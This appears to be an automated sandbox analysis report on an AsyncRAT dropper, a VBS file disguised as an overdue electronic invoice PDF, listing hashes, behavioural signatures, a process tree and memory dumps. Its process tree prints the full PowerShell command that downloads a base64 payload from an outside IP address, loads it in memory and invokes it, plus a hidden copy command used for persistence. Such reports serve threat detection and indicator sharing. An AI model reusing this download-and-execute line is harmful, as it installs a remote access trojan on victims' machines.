Analysis
- max time kernel: 61s
- max time network: 267s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 08-10-2022 08:19

Static task: static1
Behavioral task: behavioral1
- Sample: Fact_Elect_En_Mora_No. 01_0710-PASS_6010_CUFE-7IZG026010_PDF.vbs
- Resource: win7-20220812-en
General
- Target: Fact_Elect_En_Mora_No. 01_0710-PASS_6010_CUFE-7IZG026010_PDF.vbs
- Size: 442KB
- MD5: 62174dd3cc316dff4896b292cde3eebc
- SHA1: abc441c9636e64ff3c6a24879efc6c847640adfa
- SHA256: 1add10f411596ce592775736cbd547b0de4e69ae044173cb604bc1cb410dc424
- SHA512: ec4d0dd87b74e8ae268d9cea674a75920b0935095c975db0f3609af176ee3392801ec9d12ad0705964fd4491bc5b05ac6f089b7b34690a64923b5fb5c098e7f3
- SSDEEP: 768:De0E0B0S0Y0V0w0B0V0/i0j0+050kfF0NF0B0Z/0pP40E0X070M0Ao0O0gAOAqAn:7aW1AP4HgK
Malware Config
- Extracted: http://20.7.14.99/dll/dll_ink.pdf
Signatures

- Async RAT payload (2 IoCs)
  Processes (resource / yara_rule):
  - behavioral2/memory/1340-137-0x0000000000400000-0x000000000041A000-memory.dmp: asyncrat
  - behavioral2/memory/1340-138-0x000000000041474E-mapping.dmp: asyncrat

- Blocklisted process makes network request (2 IoCs)
  Processes (flow / pid / process):
  - flow 5, PID 4044, powershell.exe
  - flow 7, PID 4044, powershell.exe

- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Processes (description / ioc / process):
  - Key value queried: \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation (WScript.exe)

- Drops startup file (1 IoC)
  Processes (description / ioc / process):
  - File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk (powershell.exe)

- Suspicious use of SetThreadContext (1 IoC)
  Processes (description / pid / process / target process):
  - PID 4044 set thread context of 1340: 4044 powershell.exe -> cvtres.exe

- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  Processes (pid / process):
  - 4044 powershell.exe
  - 4044 powershell.exe
  - 312 powershell.exe
  - 312 powershell.exe
  - 4044 powershell.exe
  - 4044 powershell.exe

- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes (description / pid / process):
  - Token: SeDebugPrivilege, 4044 powershell.exe
  - Token: SeDebugPrivilege, 312 powershell.exe
  - Token: SeDebugPrivilege, 1340 cvtres.exe

- Suspicious use of WriteProcessMemory (15 IoCs)
  Processes (description / pid / process / target process):
  - PID 3880 wrote to memory of 4044: 3880 WScript.exe -> powershell.exe (2 events)
  - PID 4044 wrote to memory of 312: 4044 powershell.exe -> powershell.exe (2 events)
  - PID 4044 wrote to memory of 2664: 4044 powershell.exe -> cvtres.exe (3 events)
  - PID 4044 wrote to memory of 1340: 4044 powershell.exe -> cvtres.exe (8 events)
Processes

- [depth 1] C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fact_Elect_En_Mora_No. 01_0710-PASS_6010_CUFE-7IZG026010_PDF.vbs"
  Signatures:
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  - [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('0/9EUiS/d/ee.etsap//:sptth'))
    Signatures:
    - Blocklisted process makes network request
    - Drops startup file
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    - [depth 3] C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Debug.vbs
      Signatures:
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    - [depth 3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"

    - [depth 3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
      Signatures:
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads

- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: 6cf293cb4d80be23433eecf74ddb5503
  SHA1: 24fe4752df102c2ef492954d6b046cb5512ad408
  SHA256: b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
  SHA512: 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 6b49e8f169d2f316e251bb33b6966426
  SHA1: 72269ec042c9953fbe2465cd343034b7a7b810a8
  SHA256: 0f5bbb69b875c76e5430b8d3175df55d2cb25cb42b423de593c4d03740d4c506
  SHA512: b1e3189a8908e2891623302b466f44a55d7afbf1e786b619098242fde5b5c29322f44026a540e9b0b67885c72b0903be7470f5df5608be2e16388ec10e27b952

- memory/312-145-0x00007FFE4E8F0000-0x00007FFE4F3B1000-memory.dmp (Filesize: 10.8MB)
- memory/312-135-0x0000000000000000-mapping.dmp
- memory/312-136-0x00007FFE4E8F0000-0x00007FFE4F3B1000-memory.dmp (Filesize: 10.8MB)
- memory/1340-138-0x000000000041474E-mapping.dmp
- memory/1340-137-0x0000000000400000-0x000000000041A000-memory.dmp (Filesize: 104KB)
- memory/1340-142-0x0000000005AF0000-0x0000000005B8C000-memory.dmp (Filesize: 624KB)
- memory/1340-143-0x0000000006140000-0x00000000066E4000-memory.dmp (Filesize: 5.6MB)
- memory/1340-144-0x0000000005C00000-0x0000000005C66000-memory.dmp (Filesize: 408KB)
- memory/4044-132-0x0000000000000000-mapping.dmp
- memory/4044-134-0x00007FFE4E8F0000-0x00007FFE4F3B1000-memory.dmp (Filesize: 10.8MB)
- memory/4044-141-0x00007FFE4E8F0000-0x00007FFE4F3B1000-memory.dmp (Filesize: 10.8MB)
- memory/4044-133-0x00000176D6580000-0x00000176D65A2000-memory.dmp (Filesize: 136KB)